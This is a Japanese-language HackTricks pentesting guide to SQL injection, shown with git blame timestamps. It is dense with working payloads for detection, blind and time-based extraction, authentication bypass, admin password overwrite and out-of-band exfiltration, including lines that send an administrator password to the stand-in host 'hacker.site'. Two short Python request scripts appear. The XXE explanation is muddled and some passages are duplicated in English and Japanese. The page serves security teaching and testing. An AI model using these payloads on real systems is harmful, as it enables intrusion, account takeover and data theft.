hacktricks/pentesting-web/sql-injection/README.md

631 lines
42 KiB
Markdown
Raw Normal View History

2023-07-07 23:42:27 +00:00
# SQLインジェクション
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
2022-04-28 16:01:33 +00:00
</details>
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
2023-07-07 23:42:27 +00:00
[**RootedCON**](https://www.rootedcon.com/)は、**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの一つです。この大会は、技術的な知識を促進することを目的としており、あらゆる分野の技術とサイバーセキュリティの専門家のための活気ある交流の場です。
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2023-07-07 23:42:27 +00:00
## SQLインジェクションとは
2023-07-07 23:42:27 +00:00
SQLインジェクションは、アプリケーションがデータベースに対して行う**クエリに干渉**することができるウェブセキュリティの脆弱性です。通常は取得できないデータを閲覧することができます。これには、**他のユーザー**に属するデータや、**アプリケーション**自体が**アクセス**できる他のデータが含まれる場合があります。多くの場合、攻撃者はこのデータを**変更**または**削除**することができ、アプリケーションのコンテンツや動作に持続的な変更を引き起こすことができます。\
一部の状況では、攻撃者はSQLインジェクション攻撃をエスカレートさせて、基礎となるサーバーまたは他のバックエンドインフラストラクチャを**侵害**したり、サービス妨害攻撃を実行したりすることができます。([ここから](https://portswigger.net/web-security/sql-injection)
2023-07-07 23:42:27 +00:00
> この記事では、SQLインジェクションの可能性があると仮定し、SQLインジェクションを確認し、データベースを調査し、アクションを実行するための可能な方法について説明します。
2023-07-07 23:42:27 +00:00
## エントリーポイントの検出
2023-07-07 23:42:27 +00:00
SQLi関連の入力でサーバーが異常な動作をするため、**SQLに脆弱**なサイトを見つけたかもしれません。したがって、**最初に**行うべきことは、**クエリにデータを注入する方法を見つけることです。** そのためには、まず**現在のコンテキストから脱出する方法**を見つける必要があります。\
以下はいくつかの有用な例です:
```
2023-07-07 23:42:27 +00:00
[Nothing]
'
"
`
')
")
`)
'))
"))
`))
```
2023-07-07 23:42:27 +00:00
次に、クエリを修正する方法を知る必要があります。クエリを修正するためには、新しいデータを入力して前のクエリが新しいデータを受け入れるようにするか、単にデータを入力してコメント記号を末尾に追加することができます。
2023-07-07 23:42:27 +00:00
_エラーメッセージが表示される場合や、クエリが動作しているときと動作していないときに違いが見られる場合、このフェーズはより簡単になります。_
2023-07-07 23:42:27 +00:00
### **コメント**
```sql
MySQL
#comment
-- comment [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */
PostgreSQL
--comment
/*comment*/
MSQL
--comment
/*comment*/
Oracle
--comment
SQLite
--comment
/*comment*/
HQL
HQL does not support comments
```
2023-07-07 23:42:27 +00:00
### 論理演算子を使用して確認する
2023-07-07 23:42:27 +00:00
SQLインジェクションを確認する最も良い方法の1つは、**論理演算子**を操作させ、期待される結果を得ることです。\
例えば、GETパラメータ`?username=Peter`が`?username=Peter' or '1'='1`と同じコンテンツを返す場合、SQLインジェクションが見つかりました。
2023-07-07 23:42:27 +00:00
また、この概念を**数学演算**にも適用することができます。例えば、`?id=1`が`?id=2-1`と同じ結果を返す場合、SQLインジェクションです。
```
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
```
2023-07-07 23:42:27 +00:00
このワードリストは、提案された方法でSQLインジェクションを確認するために作成されました
{% file src="../../.gitbook/assets/sqli-logic.txt" %}
2023-07-07 23:42:27 +00:00
### タイミングでの確認
2023-07-07 23:42:27 +00:00
いくつかの場合、テストしているページには**変化が見られない**ことがあります。そのため、盲目的なSQLインジェクションを発見する良い方法は、データベースにアクションを実行させ、ページの読み込みに**時間の影響を与える**ことです。\
したがって、SQLクエリに完了に時間がかかる操作を連結させることにします
```
MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)
PostgreSQL (only support string concat)
1' || pg_sleep(10)
MSQL
1' WAITFOR DELAY '0:0:10'
Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)
SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
```
2023-07-07 23:42:27 +00:00
いくつかの場合、**sleep関数は許可されない**かもしれません。その場合、これらの関数を使用する代わりに、**複雑な操作を実行**するクエリを作成することができます。_これらのテクニックの例は、各テクロジーごとに別々にコメントされますあれば_。
2023-07-07 23:42:27 +00:00
### バックエンドの特定
2023-07-07 23:42:27 +00:00
バックエンドを特定する最良の方法は、さまざまなバックエンドの関数を実行してみることです。前のセクションの_**sleep**_ **関数**または次の関数を使用できます:
2020-11-11 00:39:24 +00:00
```bash
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```
2023-07-07 23:42:27 +00:00
また、クエリの出力にアクセスできる場合、**データベースのバージョンを表示**することができます。
{% hint style="info" %}
2023-07-07 23:42:27 +00:00
続いて、異なる種類のSQLインジェクションを悪用するための異なる方法について説明します。ここではMySQLを例にします。
{% endhint %}
2023-07-07 23:42:27 +00:00
### PortSwiggerを使用した特定
2022-10-09 20:22:51 +00:00
{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}
2023-07-07 23:42:27 +00:00
## Union Basedの悪用
2023-07-07 23:42:27 +00:00
### 列の数を検出する
2023-07-07 23:42:27 +00:00
クエリの出力を見ることができる場合、これが最も効果的な悪用方法です。\
まず、**初期リクエスト**が返す**列の数**を見つける必要があります。これは、**両方のクエリが同じ数の列を返す必要がある**ためです。\
通常、次の2つの方法が使用されます。
2022-08-31 13:22:13 +00:00
#### Order/Group by
2023-07-07 23:42:27 +00:00
偽の応答が得られるまで、数を増やし続けます。GROUP BYとORDER BYはSQLで異なる機能を持っていますが、クエリの列の数を決定するためにまったく同じ方法で使用することができます。
2021-06-26 16:09:18 +00:00
```sql
2021-02-10 15:13:06 +00:00
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
2023-07-07 23:42:27 +00:00
#-1' UNION SELECT 1,2,3--+ True
```
2021-06-26 16:09:18 +00:00
```sql
2021-02-10 15:13:06 +00:00
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
2023-07-07 23:42:27 +00:00
#-1' UNION SELECT 1,2,3--+ True
```
2022-08-31 13:22:13 +00:00
#### UNION SELECT
2023-07-07 23:42:27 +00:00
クエリが正しくなるまで、null値を選択し続けます
2021-06-26 16:09:18 +00:00
```sql
2021-02-09 23:42:01 +00:00
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
```
2023-07-07 23:42:27 +00:00
_いくつかの場合、クエリの両側の列の型は同じでなければならず、nullはすべての場合で有効ですので、`null`値を使用する必要があります。_
2023-07-07 23:42:27 +00:00
### データベース名、テーブル名、列名の抽出
2023-07-07 23:42:27 +00:00
次の例では、すべてのデータベースの名前、データベースのテーブル名、テーブルの列名を取得します。
2021-06-26 16:09:18 +00:00
```sql
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]
#Column names
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
```
2023-07-07 23:42:27 +00:00
_データベースごとにこのデータを発見するための異なる方法がありますが、常に同じ方法論があります。_
2023-07-07 23:42:27 +00:00
## 隠れたユニオンベースの攻撃を悪用する
2023-07-07 23:42:27 +00:00
クエリの出力を見ることはできますが、ユニオンベースのインジェクションを達成することができない場合、隠れたユニオンベースのインジェクションに対処しています。\
この状況では、ブラインドインジェクションになります。ブラインドインジェクションをユニオンベースのインジェクションに変換するには、バックエンドで実行されているクエリを抽出する必要があります。\
これを行うには、ブラインドインジェクションとターゲットDBMSのデフォルトテーブルを使用します。これらのデフォルトテーブルについては、ターゲットDBMSのドキュメントを参照してください。\
クエリを抽出した後、ペイロードを適切に調整し、元のクエリを安全に閉じます。その後、ペイロードにユニオンクエリを追加し、新たに取得したユニオンベースのインジェクションを悪用します。
2022-08-31 13:22:13 +00:00
2023-07-07 23:42:27 +00:00
完全な記事: https://medium.com/@Rend\_/healing-blind-injections-df30b9e0e06f
2022-02-26 12:37:06 +00:00
2023-07-07 23:42:27 +00:00
## エラーベースの攻撃を悪用する
2023-07-07 23:42:27 +00:00
何らかの理由でクエリの出力を見ることができないが、エラーメッセージを見ることができる場合、このエラーメッセージを使用してデータベースからデータを外部に持ち出すことができます。\
ユニオンベースの攻撃と同様のフローに従うことで、DBをダンプすることができます。
2021-06-26 16:09:18 +00:00
```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
```
2023-07-07 23:42:27 +00:00
## Blind SQLiの悪用
2023-07-07 23:42:27 +00:00
この場合、クエリの結果やエラーを見ることはできませんが、ページには異なるコンテンツが表示されるため、クエリがtrueまたはfalseの応答を返すときを区別することができます。\
この場合、その動作を悪用してデータベースを1文字ずつダンプすることができます。
2021-06-26 16:09:18 +00:00
```sql
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
```
2023-07-07 23:42:27 +00:00
## エラーブラインドSQLiの悪用
2023-07-07 23:42:27 +00:00
これは**前と同じケース**ですが、クエリからの真偽の応答を区別する代わりに、SQLクエリのエラーの有無おそらくHTTPサーバーがクラッシュするためを区別することができます。したがって、この場合、正しく文字を推測するたびにSQLエラーを強制することができます。
2021-06-26 16:09:18 +00:00
```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
```
2023-07-07 23:42:27 +00:00
## タイムベースのSQLiの悪用
2023-07-07 23:42:27 +00:00
この場合、ページのコンテキストに基づいてクエリの応答を区別する方法はありません。ただし、推測した文字が正しい場合、ページの読み込みに時間がかかるようにすることができます。以前に[タイミングを使用してSQLiの脆弱性を確認](./#confirming-with-timing)するためにこのテクニックをすでに見てきました。
2021-06-26 16:09:18 +00:00
```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
```
2023-07-07 23:42:27 +00:00
## スタックされたクエリ
2023-07-07 23:42:27 +00:00
スタックされたクエリを使用すると、**連続して複数のクエリを実行**することができます。ただし、後続のクエリが実行される間、**結果はアプリケーションに返されません**。したがって、このテクニックは主に、DNSルックアップ、条件付きエラー、または時間の遅延をトリガーするために2番目のクエリを使用できる**ブラインドの脆弱性**に関連して使用されます。
2023-07-07 23:42:27 +00:00
**Oracle**は**スタックされたクエリをサポートしていません**。**MySQL、Microsoft**、および**PostgreSQL**はサポートしています:`ここにクエリ1; ここにクエリ2`
2023-07-07 23:42:27 +00:00
## アウトオブバンド攻撃
2023-07-07 23:42:27 +00:00
他の**いかなる**攻撃手法も**機能しなかった**場合、データベースが情報をあなたが制御する**外部ホスト**に外部流出させることを試すことができます。たとえば、DNSクエリを介して行います
2021-06-26 16:09:18 +00:00
```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```
2023-07-07 23:42:27 +00:00
### XXEを利用した帯域外データのエクスフィルトレーション
XXEXML外部エンティティは、Webアプリケーションにおけるセキュリティ脆弱性の一つです。この脆弱性を利用することで、攻撃者はXMLパーサーを通じて外部エンティティを読み込むことができます。このテクニックを使用して、攻撃者は帯域外データのエクスフィルトレーションデータの盗み出しを行うことができます。
攻撃者は、以下の手順に従ってXXEを利用した帯域外データのエクスフィルトレーションを実行します。
2023-07-07 23:42:27 +00:00
1. 攻撃者は、ターゲットのWebアプリケーションに対してXXEペイロードを送信します。
2. XXEペイロードは、攻撃者が制御する外部エンティティを参照します。
3. 外部エンティティは、攻撃者が指定したデータを含むレスポンスを返します。
4. 攻撃者は、このレスポンスを帯域外のサーバーに送信します。
2023-07-07 23:42:27 +00:00
このようにして、攻撃者はXXEを利用してデータを盗み出すことができます。XXEの脆弱性を防ぐためには、適切な入力検証とXMLパーサーのセキュリティ設定が必要です。
```sql
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
```
2023-07-07 23:42:27 +00:00
## 自動化された攻撃手法
2023-07-07 23:42:27 +00:00
[**sqlmap**](https://github.com/sqlmapproject/sqlmap)を使用してSQLiの脆弱性を悪用するために、[SQLMapチートシート](sqlmap/)を参照してください。
2023-07-07 23:42:27 +00:00
## テクノロジー固有の情報
2023-07-07 23:42:27 +00:00
SQLインジェクションの脆弱性を悪用する方法については、すでにすべて説明しました。以下の書籍では、データベースのテクロジーに依存したさらなるトリックを見つけることができます
2022-08-31 13:22:13 +00:00
* [MS Access](ms-access-sql-injection.md)
* [MSSQL](mssql-injection.md)
* [MySQL](mysql-injection/)
2022-08-31 13:22:13 +00:00
* [Oracle](oracle-injection.md)
* [PostgreSQL](postgresql-injection/)
2023-07-07 23:42:27 +00:00
また、[**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)には、**MySQL、PostgreSQL、Oracle、MSSQL、SQLite、HQLに関する多くのトリックがあります**。
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
2023-07-07 23:42:27 +00:00
[**RootedCON**](https://www.rootedcon.com/)は、**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの一つです。技術的な知識を促進することを使命としているこの会議は、あらゆる分野の技術とサイバーセキュリティの専門家のための活気ある交流の場です。
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2023-07-07 23:42:27 +00:00
## 認証バイパス
2023-07-07 23:42:27 +00:00
ログイン機能をバイパスするために試すリスト:
{% content-ref url="../login-bypass/sql-login-bypass.md" %}
[sql-login-bypass.md](../login-bypass/sql-login-bypass.md)
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
### 認証バイパスRaw MD5
2023-07-07 23:42:27 +00:00
Raw MD5が使用されている場合、パスワードは16進数ではなく、単純な文字列としてクエリされます。
2021-06-26 16:09:18 +00:00
```sql
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
2023-07-07 23:42:27 +00:00
攻撃者が `' or 'SOMETHING` のような `true` 文を作成できるようにする。
2021-06-26 16:09:18 +00:00
```sql
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b<EFBFBD>
```
2023-07-07 23:42:27 +00:00
チャレンジのデモは[http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)で利用可能です。
2023-07-07 23:42:27 +00:00
### ハッシュ認証バイパス
2021-06-26 16:09:18 +00:00
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
2023-07-07 23:42:27 +00:00
**推奨リスト**
2023-07-07 23:42:27 +00:00
ユーザー名としてリストの各行を使用し、パスワードは常に _**Pass1234.**_ としてください。\
(これらのペイロードは、このセクションの最初に言及された大きなリストにも含まれています)
{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}
2023-07-07 23:42:27 +00:00
### GBK認証バイパス
2023-07-07 23:42:27 +00:00
もし ' がエスケープされている場合は %A8%27 を使用し、' がエスケープされると 0xA80x5c0x27 (_╘'_) が作成されます。
2021-06-26 16:09:18 +00:00
```sql
%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --
```
2023-07-07 23:42:27 +00:00
```python
import requests
2023-07-07 23:42:27 +00:00
def sql_injection(url, payload):
# Construct the SQL injection payload
payload = f"' OR {payload} -- "
2023-07-07 23:42:27 +00:00
# Send the request with the payload
response = requests.get(url + payload)
# Check if the response indicates a successful SQL injection
if "Error" in response.text:
print("SQL injection successful!")
else:
print("SQL injection failed.")
# Example usage
url = "https://example.com/login"
payload = "1=1"
sql_injection(url, payload)
```
```python
import requests
2023-07-07 23:42:27 +00:00
url = "http://example.com/index.php"
cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3')
datas = {"login": chr(0xbf) + chr(0x27) + "OR 1=1 #", "password":"test"}
r = requests.post(url, data = datas, cookies=cookies, headers={'referrer':url})
print r.text
```
2023-07-07 23:42:27 +00:00
### ポリグロットインジェクション(マルチコンテキスト)
Polyglot injection, also known as multicontext injection, is a technique used in SQL injection attacks to exploit multiple database management systems (DBMS) simultaneously. This technique involves crafting a malicious payload that can be interpreted as valid SQL code by different DBMS, allowing the attacker to target multiple systems with a single injection.
ポリグロットインジェクション、またはマルチコンテキストインジェクションは、SQLインジェクション攻撃で使用される技術であり、複数のデータベース管理システムDBMSを同時に攻撃するために使用されます。この技術では、悪意のあるペイロードを作成し、異なるDBMSによって有効なSQLコードとして解釈されるようにすることで、攻撃者は単一のインジェクションで複数のシステムを標的にすることができます。
By leveraging the syntax and functions supported by multiple DBMS, an attacker can create a payload that works across different systems. This allows the attacker to exploit vulnerabilities in various DBMS, even if they have different SQL syntax or features.
複数のDBMSがサポートする構文や関数を活用することで、攻撃者は異なるシステム間で動作するペイロードを作成することができます。これにより、攻撃者は異なるSQL構文や機能を持つ場合でも、さまざまなDBMSの脆弱性を悪用することができます。
Polyglot injection is a powerful technique as it allows the attacker to target a wide range of systems with a single payload. However, crafting a polyglot payload can be challenging, as it requires a deep understanding of the syntax and features of multiple DBMS.
ポリグロットインジェクションは、単一のペイロードで広範なシステムを標的にすることができるため、非常に強力な技術です。ただし、ポリグロットペイロードの作成は難しい場合があります。なぜなら、複数のDBMSの構文や機能についての深い理解が必要だからです。
2023-07-07 23:42:27 +00:00
It is important for developers and security professionals to be aware of the risks associated with polyglot injection and implement proper input validation and parameterized queries to mitigate the risk of SQL injection attacks.
2023-07-07 23:42:27 +00:00
ポリグロットインジェクションに関連するリスクについての認識を持ち、適切な入力検証とパラメータ化されたクエリを実装することは、開発者やセキュリティ専門家にとって重要です。これにより、SQLインジェクション攻撃のリスクを軽減することができます。
2021-06-26 16:09:18 +00:00
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
2023-07-07 23:42:27 +00:00
## Insert文
2023-07-07 23:42:27 +00:00
### 既存のオブジェクト/ユーザーのパスワードを変更する
2023-07-07 23:42:27 +00:00
これを行うには、おそらく**管理者**(ユーザーの場合)と同じ名前の**「マスターオブジェクト」として新しいオブジェクトを作成**し、何かを変更する必要があります。
2023-07-07 23:42:27 +00:00
- 名前が「AdMIn」大文字と小文字が混在のユーザーを作成します。
- 名前が「admin =」のユーザーを作成します。
- **SQL Truncation Attack**(ユーザー名またはメールに**文字数制限**がある場合)--> 名前が「admin \[たくさんのスペース] a」のユーザーを作成します。
2022-08-31 13:22:13 +00:00
#### SQL Truncation Attack
2023-07-07 23:42:27 +00:00
データベースが脆弱で、ユーザー名の最大文字数が例えば30であり、ユーザー**admin**をなりすます場合、ユーザー名を「"_admin \[30スペース] a_"」として、任意のパスワードを設定して作成してみてください。
2023-07-07 23:42:27 +00:00
データベースは、入力されたユーザー名がデータベース内に存在するかどうかを**チェック**します。もし存在しない場合、ユーザー名を**許可された最大文字数**(この場合は「"_admin \[25スペース]_"」)まで**切り詰め**、そしてデータベース内のユーザー「**admin**」の**新しいパスワード**である**末尾のスペースを自動的に削除**して更新します(エラーが発生することもありますが、これは機能していないことを意味しません)。
2023-07-07 23:42:27 +00:00
詳細情報:[https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
2023-07-07 23:42:27 +00:00
_注: 最新のMySQLインストールでは、上記の説明通りにはこの攻撃は機能しなくなりました。比較はまだ末尾の空白をデフォルトで無視しますが、フィールドの長さよりも長い文字列を挿入しようとするとエラーが発生し、挿入は失敗します。詳細については、_ [_https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation_](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation)\_\_
2022-08-31 13:22:13 +00:00
### MySQL Insert time based checking
2023-07-07 23:42:27 +00:00
VALUESステートメントを終了するために、`','',''`を適当な回数追加します。遅延が発生した場合、SQLインジェクションが存在します。
2021-06-26 16:09:18 +00:00
```sql
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
```
2022-08-31 13:22:13 +00:00
### ON DUPLICATE KEY UPDATE
2023-07-07 23:42:27 +00:00
ON DUPLICATE KEY UPDATEキーワードは、MySQLに対して、アプリケーションが既にテーブルに存在する行を挿入しようとした場合に何をするかを指示するために使用されます。これを使用して、管理者パスワードを変更することができます。以下の手順に従ってください
```sql
INSERT INTO users (id, username, password) VALUES (1, 'admin', 'new_password')
ON DUPLICATE KEY UPDATE password = 'new_password';
```
2023-07-07 23:42:27 +00:00
このクエリは、usersテーブルにidが1でusernameが'admin'の行が既に存在する場合、その行のpasswordを'new_password'に更新します。存在しない場合は、新しい行を挿入します。
```
Inject using payload:
2023-07-07 23:42:27 +00:00
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
The query would look like this:
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.
Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty".
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
```
2023-07-07 23:42:27 +00:00
### 情報の抽出
2023-07-07 23:42:27 +00:00
#### 同時に2つのアカウントを作成する
2023-07-07 23:42:27 +00:00
新しいユーザーとユーザー名、パスワード、メールが必要な場合、以下のようになります:
```
SQLi payload:
2021-05-29 18:21:55 +00:00
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -
A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
```
2023-07-07 23:42:27 +00:00
#### 10進数または16進数を使用する
2023-07-07 23:42:27 +00:00
このテクニックを使用すると、1つのアカウントの作成だけで情報を抽出することができます。コメントを追加する必要はないことに注意してください。
2023-07-07 23:42:27 +00:00
**hex2dec**と**substr**を使用する:
2021-06-26 16:09:18 +00:00
```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
2023-07-07 23:42:27 +00:00
テキストを取得するには、次のコードを使用します:
2021-06-26 16:09:18 +00:00
```python
__import__('binascii').unhexlify(hex(215573607263)[2:])
```
2023-07-07 23:42:27 +00:00
**hex**と**replace**(および**substr**)を使用する方法:
2021-06-26 16:09:18 +00:00
```sql
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
2021-06-26 16:09:18 +00:00
#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
2023-07-07 23:42:27 +00:00
[**RootedCON**](https://www.rootedcon.com/)は**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの一つです。技術的な知識を促進することを使命としており、この会議はあらゆる分野の技術とサイバーセキュリティの専門家のための活気ある交流の場です。
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2023-07-07 23:42:27 +00:00
## ルーテッドSQLインジェクション
2023-07-07 23:42:27 +00:00
ルーテッドSQLインジェクションは、出力を生成するクエリではなく、インジェクション可能なクエリの出力が出力を生成するクエリに入力される状況です。 ([論文](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
2023-07-07 23:42:27 +00:00
例:
2021-06-26 16:09:18 +00:00
```sql
#Hex of: -1' union select login,password from users-- a
